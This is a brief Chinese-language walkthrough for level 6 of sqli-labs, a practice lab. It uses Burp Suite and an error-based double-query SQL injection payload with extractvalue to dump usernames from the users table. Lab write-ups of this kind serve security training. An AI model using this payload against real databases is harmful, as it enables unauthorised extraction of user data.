一、sqli-labs(less6)GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)
1.观察index.php中$sql
2,burp拦截
3.repeater一下
4,简单修改一下,用extractvalue函数
?id=100" union select 1,2,extractvalue(1,concat('%',(select group_concat(username) from users))) --+
5,大功告成